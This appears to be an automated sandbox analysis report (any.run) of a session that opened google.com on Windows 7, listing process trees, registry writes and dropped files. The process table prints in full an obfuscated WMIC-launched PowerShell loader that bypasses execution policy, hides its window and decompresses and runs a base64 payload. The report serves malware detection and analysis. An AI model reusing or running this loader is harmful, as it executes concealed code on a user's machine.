URL: | http://www.google.com |
Full analysis: | https://app.any.run/tasks/bc045738-edb7-4ed0-b9f2-761a04a4d35b |
Verdict: | Malicious activity |
Analysis date: | July 16, 2019, 23:01:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | ED646A3334CA891FD3467DB131372140 |
SHA1: | 738DDF35B3A85A7A6BA7B232BD3D5F1E4D284AD1 |
SHA256: | 253D142703041DD25197550A0FC11D6AC03BEFC1E64A1320009F1EDF400C39AD |
SSDEEP: | 3:N1KJS4IK:Cc4IK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3856 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://www.google.com" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3600 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3856 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3576 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3492 | WmiC "prOcess" "CAlL" "CrEATe" "PoWersheLl -NoPRofiLE -EXECUTiONpoLI bYpAss -wiN 000000000000000000000000000000000000000000000000000000000000000001 -nOninT . ( $sHELlid[1]+$sHeLLiD[13]+'x')("\".('sl');&('sa'+'l') ('Ll') ('sa'+'l');&('lp');.('Ll') ('Pp') ('N'+'Ew-ObJ'+'ect');&('Ll') ('Pp'+'p') ('i'+'EX');&('Pp'+'p')(&('Pp') ('SysteM.i'+'O.co'+'mPRES'+'siOn'+'.'+'defLA'+'tESTrE'+'A'+'m')([IO.mEmORYsTReam][conVert]::FROmBaSe64stRing( ('PZlbi+'+'XGFYX/Sj9E9AxoQlWpLkE+b1FQHBkzWPMQMCYY4oDDYJ9kJnlJot+e9a0tG6an++hI'+'VbVva6299dXHlz//7WX/4fO77fvPP3zx1ceXP/3j5Z//+umvHz8u5YtvP3345suv9+/W9e8'+'/f/nTm5fX15dZ/9e656KftkyjrbmOZ65'+'tz73OrenPZc5tHLm3M7e+6fKur/W5XGPZWzpqmnLR'+'T09nTY+a1pzzQ4/MrZ+5LJvWPnX3oae0eNbXTauUTZ9nfX7mVJ/3iqeWa2nVMlrxqRUPlmt5ypnlHjrMrj/1o8P0NOfiZVZtM/mneedHzn1rnZVnm5L6kXPdcso6ka4ldlsu2'+'XJoCU52+jst29Jc05WXhUUfecm6i79t9VN3TE2LsU8ea+uzrjy03mWrmlxXyqmn5D6O5PUvPXlpf'+'Z7e89J2jFqWcG0eV+aovccyHKfLYUt7jLIOfUod900OQsOF'+'hc'+'XkwoUnpt7PXjkkz'+'8lvBYexpswcMueqQ07oOox2WcrTq9eyjYwL5VndnJodzvMKa276rQf1hEySC'+'bXI07hnYU123fFwzu'+'V'+'pp5TMvZO+033ptHuzzlF1T1lO25W0e9apU5lvN8mh/bC7utZO8gM+yHq25NnXuiK9KPhNiTKSLJ'+'bfEmeTF0jFkvau5fTYyAeLZh2GK4plz5NzbHl2nboq'+'GFW3pdt1/fDBG/Eoj65YtH4naJt0KezuXXEiZWRbk11leGn54+hDC+ZtKFMzTmzctY+kuJP12qMtW9e5O3e0nR2bTM157ZxeEVMMIofl0ULNcXB5pQ+8MXetQWUuckYjMdrkgLhSKANdd1YWnH1FarCv7u2qsoJz+zHS3MfR0x3VoQVkASVVFHRnjR4apPlYu87PcxjfMHbMQ3ZTOs1xVEEoTagD2d9KhISslp9H3l3SZEPCHkVc'+'xdaVJAvrLgCDkqQr9R6OX27kqf4GYth22SheyqLIwoSTlkd37gpfBpnIbwwkUx/OhqLrOKmkyJ6qDYkLAa5jBZv6Qk0qecpT3u19774n6qIKotLCIVe2yB0/7j5Y0eMjrU6+J'+'T/bs'+'vbKAaYAGbkFI/WN0mNzVAiedmNDx7XFObi1j7A2V6ek4Ar4Ub45c4VG+JMDNSFJzk8frOeDhFK8utzqMOFmPc9yRb'+'u18rwLRG5QHgAVifiDN1kbULA3ium+tsj4046yhQ3jTwKfiF2/vLB9IxsMkJimTVM5I2cVKSrT'+'mFs420E4KqnUlWk7iSC'+'8zt6n7k33DsVK9xlBesBqv8+Iixpny0E7'+'SX'+'+nQXET1sedrkC6kqRc3bgTGAA4VwNz8IWxj4pqM2doIC9PAzWq8oTTd'+'mdspsgvyjXL4gQiGg4eGJzKw2juPKRwQHY5IQOJhm0ljxIuKVYZ7iwwzCqG3Mj0wGryae6'+'ukK3J4mzvzTat9Qh9uVkJx1OYQ4nBthcgvIBs1GE32KS6Or8ysHrZCKP+kyOSt8RftWtoE7pz3rY6V'+'YVPScmmQlY1yTHDcEtWzJGcyj1YscFk5REIk3fhgbay85WvvW4QUDFi4gvtWGTr6iru7TCy40mwxm7r9rfp3cVnkiXd5HUbp9prOAf+YlPZyB7J+XOhRyLxoJOqBagH/R6uEzY7LACarkE35BypwXJJYc1UAtCeAFdy/TQ6LwAH9FKn'+'O22uiDmVRPoo8VE+SQ6ALLNOqOgNsJkEFbnoY0IxWb1cEBlW'+'JzLd0LGZWkudXFzLgWhqUWONunX4yPkZBM7GWCMZlQC9ho3K20EOH34IHkeKELIU+MV5jDEkiolit69VuwPLqJsSKJUWGOhwiZdm4LE1nHVsoJwSt8E9ZUOtNds4OYzCGTLJCoskUdKWEuzRxBrjpnV83qN6ITgkBCxSZJq0jB8HKRYcOAdJYZ'+'cZ9'+'nJ5eZm2OSyQEEZQ'+'Wsn67iL6RemkKBs0FZHQHvD3TDFkik5fKt2N5t6/'+'E7iQJxXeRvk5QXUepBfZfaLnMujSSDmdrev2hlt0S4XT9Bi+RV3BKyMc5Nrjaz1WBC8Zen5QEBkDy5PqLzp4rSjauZkaN0ocfWSIkB05EezDuy4hyXTm0Gqg1BkQoxRNhjMgaAvAHw8kBaVKFVd+dKlHZghGIUpLzPEM4WEFrJiAjRitBfldiTJw8ODICRDZu32mI7aLs'+'wyf8rRyk9AQyiAGEtCsXoCaRf4tq8s5VJDMSTdxp9M+TxyNwxt'+'bL'+'2PQko+QiA1cWTkOfENpw++kUFZZCs67'+'WWuyCxBrLrIcsoC/oR'+'jAlkIEqaIO0DQhefKCXMNPEz2NnYDYkFwz2O1myurgPwOTDx+voYIRYoqjIUImWBHC6eW'+'wz4BkEN264TJVDuB3gJ'+'ghdOxCPAMktAhtI7QZZAqKTFZY4RHuK7QA2cTmaNBFVfhrchtTraE2e8oog1QAf5Y5mPUIoTMuSAIR1E4LUiSCke0yIVh8VSz8'+'JcNh/uneepJLdS0/kG/DOBv0WeiCsLJYMBA7DFKAzKaAx'+'ZjC7yk4jQqkJ3JLg6YVfnKr'+'1eiJrldyoDRUADuHRWm16J/kM5WQ'+'Swb+2e1op1dzukGhNA19CfoB+yq64XKVWrfTQEoZT22JngENJba0zmvuKE5DqnU1WNieI'+'IPCapuVaeYaWbQQyXK5x41UChNcIAAF+go'+'8RCOj6zo9r8GZBC7CA/vl4pfYEbFUc+BkcfOHX6eoTf'+'BnorBNmPlyWgqGiD0etyIAD5Ph2pKG2ncFPDv/NteBZLM7gTaT60l7JRhsC7RAMigRaLOpp246CdElVQA6Wi1Hz6l0bG7IDxQ+xxZ+QFnQGJlC7VlNcdcN8W4e8+EWFLwrp'+'6tl3J0NgQQjRvCGm/4ldBapab9kfIkeAhBXp/+gQFNEza0ibeag4b3cTTaa3d1w1BhDuFE7/Wi'+'CJLN'+'xfhj+3Rc6EVF8JVSAo4tCqDlatk4YLWcD6c'+'AV4ztip'+'imnFYBBfYGqZzdwrj5IoWQBueagmAkaHPS0yfRnqlVmCLk/SN'+'M'+'Bc'+'4TOsQZFGaNXaLL6ZUSAemiU0DlwXa6zW9iMF'+'pTSYMxCncC1Isi2WvFYaSy7ayCZpna'+'fDm3OwQm4'+'WsfuEE7mqOLUCNzJy'+'+pOjIaNssswJgLM6vFhfFpUaePq7qifRhGJWxIQFuYMRpC+O8cWUISoW/Jsnk9I7pioxOlqpcmxxCzjpMFuKFH39KdDq7BSxtYq'+'BUGiNLso22Rp+'+'XSDu5DkNXwNEjKmkl7'+'PBoQRQXcpM2Wwex8mOiRg2n8V'+'HrQ+RXj'+'IVocokmB73CKxDoSgZNz5TfYT4IP3RZCSh3Btb6ECKto'+'NFvVSa3dfR4q'+'iVva+uDFAyXGVkQSxHveUyXoGbUVu0RzXmEBl67HT2jeVGNFURdINpHk++jtICHkNQVJyKv5E7+c26'+'GFwGvh2MjIN487Dj2TT84aay8vhMrEulCoC/9RnDwO9zBwUar8HBzCoRfguIKSVKstxs9bs+Zbq1YBIN4xK4zL5yulDvGf24sQVlXA6LIqSAoh98DNzTBLaedcs8+wSuarfiiadt/7Cme4/XEOSXhS+S2wOKKZ/'+'A'+'VnzTt4SyCyfBCnuDp1843YNGcAkaDUINkuwi1mq+'+'Xx2blsyMB8K'+'ik/GbvMqSqYyhq'+'MPqdFvWkd2BeEWOSjxEptqJzwN/tANq'+'dJd'+'rliJTK4xc0Mfw+sxwt2jlU4XeUv/Cj6oIJlZAMO6NAw/9OerWp'+'3utpr89p58aXauJh6jDZc93XpEq4cVBgamIqxOr'+'7Tiqqimw80no8vlZhnUHLhe3AKSIcw9'+'h1uy0zjISDptHvmY3zkOzEizv3pU4xFCPgJYR4gSsMqKlaa2HQGGOhY+HwbN5z1O2VwkDR95/HUYgjChLWFOZmqxe4g'+'mwdctzkKURVM1U9x4y3Aj+eNKWgNGS5jAWqJEdTKujR5m9+h/8Aa8Q3drDT91t1qz'+'fV5CgdG4pY18NQQhVherUEzp9IqzkZJCpF1hnLDZlsYQhF7gsu'+'RPMX5nevLLfAYi8NyH1tPTlSlyfzxizGfCmJyS'+'cEgVq8z'+'RRHmMfngCiAb1DNXOYqbiThEsgYMtbp9usaMFcOtxz5rmqJ4dJMjg'+'Bb5Tu8QEn74YvNjDXavHrkAnE87q2SEtrZBKaGOF6LnIM6rZzSH'+'uQKy4PTLpT1ai'+'lW58BBsBHLQ+BJKiZeo3G0JQHQx/W+QUHSMDtOgKjX/97gCAp0Q+08ORw1rD2BUSc7KP3G2BxuaHmJy4XYB9SrwbYBjQzavx'+'AiLle0SmLs2z0skfRXV8hAg9a0yBpx'+'yh4DK+mqBLxKSbsLF7YtBHvCahQ6UPouzpCfx9WvlIkBjaBGPT/GywOqcUpXR3/rtV/3JGiU92s6fT0pVuWmbH1iDOYC/t3OGBibS5UhT'+'uEtMxlx4eVprmPdecmBiCXahm'+'qJExeO6RH8AOghBe8XiffPHwaw51PXsAJaFnBcFTrkiGoZPPUtyaOtPGfUSIJSZAT8qHLLMweBiA+ukc9gipu1Pp5qmHl3LT3XcH2RMHpqtXuHV3IdF/M8kAbtBoWdgLXWKZ2h1EteegZ3RUHNWvtI5QAGAfR152T7ktCLcYVvBSCl15WustxvEMWQpBPMmYPKZigOChHX3JEa9lKs0Qwxxr'+'TbByDYS/PGSwrvSiR0gZT5IOD2aqT'+'3nrWAZhZIffB/lt3SNa8BgGA2ZM2nO47Gq3qkaf4jTLHKJ5ACjAjKEq3vJYTBb04uI'+'xLhAnyefAEhCPpoK4/SbI2n+15s5mqHg5kD3/tn6mk+yGSvSJZ6c'+'MQo14'+'u4dHQI0W6C51vEnu6wFOi+'+'axJLznux61merQABvl5CRjqAutjJhUoN1tKG9D6G939yFUPlhMO1V6zD3ghighaJRBpcPpN6FPRBLzOhPuMdo02qYuq6mLrKvfYAZMP2gS4jXuZH4rKV5LJl7EUsV8'+'l6MhUZq5I+fpcd23P/xWzTlzvxf16GDcr214+0nXQwuvslvaKcZzX0Gv6XfIcQf'+'wH6IrXr'+'T5Heyy'+'Nhki6VanCnEsMWLh'+'eyeietV+3c1ztFvmd1A1zw'+'4sjd'+'7SVkEBTAukc8Tq0QdO0OprTSt79GBiijzZ/bGZhy1tdpEJDQXOVT0'+'LQeEGoBofpNd35/uvfvzwOr+++/T+o/7YX1/efXp+/PHz66bvnnw36dKpS'+'x9eXh9x2+eX1/PX+56/fP16ce39xy8/vx5c83rr68t/p/+8vHn59vc///TvP3zz4bt1/fzzj19/yP3Nm5ff/OW3'+'H37+9OGbH7/e37x9+zL/7u277z/p1j9+/'+'813b//39uXty3/fP5//Bw==') ) "\" + [StrinG][Char]44 +"\"[iO.CoMPressiOn.ComPreSSiONmODe]::DeCoMpreSS)|.('%') {.('Pp') ('SY'+'st'+'Em.Io.stRe'+'AmreAd'+'er')(`${_}"\" + [StrinG][Char]44 +"\" [TExT.eNCOdinG]::ASciI)} ).reADtoEnD()"\" )" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3460 | PoWersheLl -NoPRofiLE -EXECUTiONpoLI bYpAss -wiN 000000000000000000000000000000000000000000000000000000000000000001 -nOninT . ( $sHELlid[1]+$sHeLLiD[13]+'x')("\".('sl');&('sa'+'l') ('Ll') ('sa'+'l');&('lp');.('Ll') ('Pp') ('N'+'Ew-ObJ'+'ect');&('Ll') ('Pp'+'p') ('i'+'EX');&('Pp'+'p')(&('Pp') ('SysteM.i'+'O.co'+'mPRES'+'siOn'+'.'+'defLA'+'tESTrE'+'A'+'m')([IO.mEmORYsTReam][conVert]::FROmBaSe64stRing( ('PZlbi+'+'XGFYX/Sj9E9AxoQlWpLkE+b1FQHBkzWPMQMCYY4oDDYJ9kJnlJot+e9a0tG6an++hI'+'VbVva6299dXHlz//7WX/4fO77fvPP3zx1ceXP/3j5Z//+umvHz8u5YtvP3345suv9+/W9e8'+'/f/nTm5fX15dZ/9e656KftkyjrbmOZ65'+'tz73OrenPZc5tHLm3M7e+6fKur/W5XGPZWzpqmnLR'+'T09nTY+a1pzzQ4/MrZ+5LJvWPnX3oae0eNbXTauUTZ9nfX7mVJ/3iqeWa2nVMlrxqRUPlmt5ypnlHjrMrj/1o8P0NOfiZVZtM/mneedHzn1rnZVnm5L6kXPdcso6ka4ldlsu2'+'XJoCU52+jst29Jc05WXhUUfecm6i79t9VN3TE2LsU8ea+uzrjy03mWrmlxXyqmn5D6O5PUvPXlpf'+'Z7e89J2jFqWcG0eV+aovccyHKfLYUt7jLIOfUod900OQsOF'+'hc'+'XkwoUnpt7PXjkkz'+'8lvBYexpswcMueqQ07oOox2WcrTq9eyjYwL5VndnJodzvMKa276rQf1hEySC'+'bXI07hnYU123fFwzu'+'V'+'pp5TMvZO+033ptHuzzlF1T1lO25W0e9apU5lvN8mh/bC7utZO8gM+yHq25NnXuiK9KPhNiTKSLJ'+'bfEmeTF0jFkvau5fTYyAeLZh2GK4plz5NzbHl2nboq'+'GFW3pdt1/fDBG/Eoj65YtH4naJt0KezuXXEiZWRbk11leGn54+hDC+ZtKFMzTmzctY+kuJP12qMtW9e5O3e0nR2bTM157ZxeEVMMIofl0ULNcXB5pQ+8MXetQWUuckYjMdrkgLhSKANdd1YWnH1FarCv7u2qsoJz+zHS3MfR0x3VoQVkASVVFHRnjR4apPlYu87PcxjfMHbMQ3ZTOs1xVEEoTagD2d9KhISslp9H3l3SZEPCHkVc'+'xdaVJAvrLgCDkqQr9R6OX27kqf4GYth22SheyqLIwoSTlkd37gpfBpnIbwwkUx/OhqLrOKmkyJ6qDYkLAa5jBZv6Qk0qecpT3u19774n6qIKotLCIVe2yB0/7j5Y0eMjrU6+J'+'T/bs'+'vbKAaYAGbkFI/WN0mNzVAiedmNDx7XFObi1j7A2V6ek4Ar4Ub45c4VG+JMDNSFJzk8frOeDhFK8utzqMOFmPc9yRb'+'u18rwLRG5QHgAVifiDN1kbULA3ium+tsj4046yhQ3jTwKfiF2/vLB9IxsMkJimTVM5I2cVKSrT'+'mFs420E4KqnUlWk7iSC'+'8zt6n7k33DsVK9xlBesBqv8+Iixpny0E7'+'SX'+'+nQXET1sedrkC6kqRc3bgTGAA4VwNz8IWxj4pqM2doIC9PAzWq8oTTd'+'mdspsgvyjXL4gQiGg4eGJzKw2juPKRwQHY5IQOJhm0ljxIuKVYZ7iwwzCqG3Mj0wGryae6'+'ukK3J4mzvzTat9Qh9uVkJx1OYQ4nBthcgvIBs1GE32KS6Or8ysHrZCKP+kyOSt8RftWtoE7pz3rY6V'+'YVPScmmQlY1yTHDcEtWzJGcyj1YscFk5REIk3fhgbay85WvvW4QUDFi4gvtWGTr6iru7TCy40mwxm7r9rfp3cVnkiXd5HUbp9prOAf+YlPZyB7J+XOhRyLxoJOqBagH/R6uEzY7LACarkE35BypwXJJYc1UAtCeAFdy/TQ6LwAH9FKn'+'O22uiDmVRPoo8VE+SQ6ALLNOqOgNsJkEFbnoY0IxWb1cEBlW'+'JzLd0LGZWkudXFzLgWhqUWONunX4yPkZBM7GWCMZlQC9ho3K20EOH34IHkeKELIU+MV5jDEkiolit69VuwPLqJsSKJUWGOhwiZdm4LE1nHVsoJwSt8E9ZUOtNds4OYzCGTLJCoskUdKWEuzRxBrjpnV83qN6ITgkBCxSZJq0jB8HKRYcOAdJYZ'+'cZ9'+'nJ5eZm2OSyQEEZQ'+'Wsn67iL6RemkKBs0FZHQHvD3TDFkik5fKt2N5t6/'+'E7iQJxXeRvk5QXUepBfZfaLnMujSSDmdrev2hlt0S4XT9Bi+RV3BKyMc5Nrjaz1WBC8Zen5QEBkDy5PqLzp4rSjauZkaN0ocfWSIkB05EezDuy4hyXTm0Gqg1BkQoxRNhjMgaAvAHw8kBaVKFVd+dKlHZghGIUpLzPEM4WEFrJiAjRitBfldiTJw8ODICRDZu32mI7aLs'+'wyf8rRyk9AQyiAGEtCsXoCaRf4tq8s5VJDMSTdxp9M+TxyNwxt'+'bL'+'2PQko+QiA1cWTkOfENpw++kUFZZCs67'+'WWuyCxBrLrIcsoC/oR'+'jAlkIEqaIO0DQhefKCXMNPEz2NnYDYkFwz2O1myurgPwOTDx+voYIRYoqjIUImWBHC6eW'+'wz4BkEN264TJVDuB3gJ'+'ghdOxCPAMktAhtI7QZZAqKTFZY4RHuK7QA2cTmaNBFVfhrchtTraE2e8oog1QAf5Y5mPUIoTMuSAIR1E4LUiSCke0yIVh8VSz8'+'JcNh/uneepJLdS0/kG/DOBv0WeiCsLJYMBA7DFKAzKaAx'+'ZjC7yk4jQqkJ3JLg6YVfnKr'+'1eiJrldyoDRUADuHRWm16J/kM5WQ'+'Swb+2e1op1dzukGhNA19CfoB+yq64XKVWrfTQEoZT22JngENJba0zmvuKE5DqnU1WNieI'+'IPCapuVaeYaWbQQyXK5x41UChNcIAAF+go'+'8RCOj6zo9r8GZBC7CA/vl4pfYEbFUc+BkcfOHX6eoTf'+'BnorBNmPlyWgqGiD0etyIAD5Ph2pKG2ncFPDv/NteBZLM7gTaT60l7JRhsC7RAMigRaLOpp246CdElVQA6Wi1Hz6l0bG7IDxQ+xxZ+QFnQGJlC7VlNcdcN8W4e8+EWFLwrp'+'6tl3J0NgQQjRvCGm/4ldBapab9kfIkeAhBXp/+gQFNEza0ibeag4b3cTTaa3d1w1BhDuFE7/Wi'+'CJLN'+'xfhj+3Rc6EVF8JVSAo4tCqDlatk4YLWcD6c'+'AV4ztip'+'imnFYBBfYGqZzdwrj5IoWQBueagmAkaHPS0yfRnqlVmCLk/SN'+'M'+'Bc'+'4TOsQZFGaNXaLL6ZUSAemiU0DlwXa6zW9iMF'+'pTSYMxCncC1Isi2WvFYaSy7ayCZpna'+'fDm3OwQm4'+'WsfuEE7mqOLUCNzJy'+'+pOjIaNssswJgLM6vFhfFpUaePq7qifRhGJWxIQFuYMRpC+O8cWUISoW/Jsnk9I7pioxOlqpcmxxCzjpMFuKFH39KdDq7BSxtYq'+'BUGiNLso22Rp+'+'XSDu5DkNXwNEjKmkl7'+'PBoQRQXcpM2Wwex8mOiRg2n8V'+'HrQ+RXj'+'IVocokmB73CKxDoSgZNz5TfYT4IP3RZCSh3Btb6ECKto'+'NFvVSa3dfR4q'+'iVva+uDFAyXGVkQSxHveUyXoGbUVu0RzXmEBl67HT2jeVGNFURdINpHk++jtICHkNQVJyKv5E7+c26'+'GFwGvh2MjIN487Dj2TT84aay8vhMrEulCoC/9RnDwO9zBwUar8HBzCoRfguIKSVKstxs9bs+Zbq1YBIN4xK4zL5yulDvGf24sQVlXA6LIqSAoh98DNzTBLaedcs8+wSuarfiiadt/7Cme4/XEOSXhS+S2wOKKZ/'+'A'+'VnzTt4SyCyfBCnuDp1843YNGcAkaDUINkuwi1mq+'+'Xx2blsyMB8K'+'ik/GbvMqSqYyhq'+'MPqdFvWkd2BeEWOSjxEptqJzwN/tANq'+'dJd'+'rliJTK4xc0Mfw+sxwt2jlU4XeUv/Cj6oIJlZAMO6NAw/9OerWp'+'3utpr89p58aXauJh6jDZc93XpEq4cVBgamIqxOr'+'7Tiqqimw80no8vlZhnUHLhe3AKSIcw9'+'h1uy0zjISDptHvmY3zkOzEizv3pU4xFCPgJYR4gSsMqKlaa2HQGGOhY+HwbN5z1O2VwkDR95/HUYgjChLWFOZmqxe4g'+'mwdctzkKURVM1U9x4y3Aj+eNKWgNGS5jAWqJEdTKujR5m9+h/8Aa8Q3drDT91t1qz'+'fV5CgdG4pY18NQQhVherUEzp9IqzkZJCpF1hnLDZlsYQhF7gsu'+'RPMX5nevLLfAYi8NyH1tPTlSlyfzxizGfCmJyS'+'cEgVq8z'+'RRHmMfngCiAb1DNXOYqbiThEsgYMtbp9usaMFcOtxz5rmqJ4dJMjg'+'Bb5Tu8QEn74YvNjDXavHrkAnE87q2SEtrZBKaGOF6LnIM6rZzSH'+'uQKy4PTLpT1ai'+'lW58BBsBHLQ+BJKiZeo3G0JQHQx/W+QUHSMDtOgKjX/97gCAp0Q+08ORw1rD2BUSc7KP3G2BxuaHmJy4XYB9SrwbYBjQzavx'+'AiLle0SmLs2z0skfRXV8hAg9a0yBpx'+'yh4DK+mqBLxKSbsLF7YtBHvCahQ6UPouzpCfx9WvlIkBjaBGPT/GywOqcUpXR3/rtV/3JGiU92s6fT0pVuWmbH1iDOYC/t3OGBibS5UhT'+'uEtMxlx4eVprmPdecmBiCXahm'+'qJExeO6RH8AOghBe8XiffPHwaw51PXsAJaFnBcFTrkiGoZPPUtyaOtPGfUSIJSZAT8qHLLMweBiA+ukc9gipu1Pp5qmHl3LT3XcH2RMHpqtXuHV3IdF/M8kAbtBoWdgLXWKZ2h1EteegZ3RUHNWvtI5QAGAfR152T7ktCLcYVvBSCl15WustxvEMWQpBPMmYPKZigOChHX3JEa9lKs0Qwxxr'+'TbByDYS/PGSwrvSiR0gZT5IOD2aqT'+'3nrWAZhZIffB/lt3SNa8BgGA2ZM2nO47Gq3qkaf4jTLHKJ5ACjAjKEq3vJYTBb04uI'+'xLhAnyefAEhCPpoK4/SbI2n+15s5mqHg5kD3/tn6mk+yGSvSJZ6c'+'MQo14'+'u4dHQI0W6C51vEnu6wFOi+'+'axJLznux61merQABvl5CRjqAutjJhUoN1tKG9D6G939yFUPlhMO1V6zD3ghighaJRBpcPpN6FPRBLzOhPuMdo02qYuq6mLrKvfYAZMP2gS4jXuZH4rKV5LJl7EUsV8'+'l6MhUZq5I+fpcd23P/xWzTlzvxf16GDcr214+0nXQwuvslvaKcZzX0Gv6XfIcQf'+'wH6IrXr'+'T5Heyy'+'Nhki6VanCnEsMWLh'+'eyeietV+3c1ztFvmd1A1zw'+'4sjd'+'7SVkEBTAukc8Tq0QdO0OprTSt79GBiijzZ/bGZhy1tdpEJDQXOVT0'+'LQeEGoBofpNd35/uvfvzwOr+++/T+o/7YX1/efXp+/PHz66bvnnw36dKpS'+'x9eXh9x2+eX1/PX+56/fP16ce39xy8/vx5c83rr68t/p/+8vHn59vc///TvP3zz4bt1/fzzj19/yP3Nm5ff/OW3'+'H37+9OGbH7/e37x9+zL/7u277z/p1j9+/'+'813b//39uXty3/fP5//Bw==') ) "\" + [StrinG][Char]44 +"\"[iO.CoMPressiOn.ComPreSSiONmODe]::DeCoMpreSS)|.('%') {.('Pp') ('SY'+'st'+'Em.Io.stRe'+'AmreAd'+'er')(`${_}"\" + [StrinG][Char]44 +"\" [TExT.eNCOdinG]::ASciI)} ).reADtoEnD()"\" ) | C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
692 | "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe" | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell ISE Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3344 | C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe | C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe | — | services.exe |
User: LOCAL SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: PresentationFontCache.exe Version: 3.0.6920.4902 built by: NetFXw7 |
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
Operation: | write | Name: | {A3E802C3-A81D-11E9-95C0-5254004A04AF} |
Value: 0 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
Operation: | write | Name: | Type |
Value: 4 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
Operation: | write | Name: | Count |
Value: 2 | |||
(PID) Process: | (3856) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
Operation: | write | Name: | Time |
Value: E307070002001000170001001C009D00 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3600 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3600 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\8BW8CI0Y\google_com[1].txt | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF25B0F3102B6CDC62.TMP | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFBE99782AD7E29393.TMP | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFF5036D50E222C273.TMP | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF66FBDD06CB25E5DD.TMP | — | |
MD5:— | SHA256:— | |||
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{A3E802C3-A81D-11E9-95C0-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
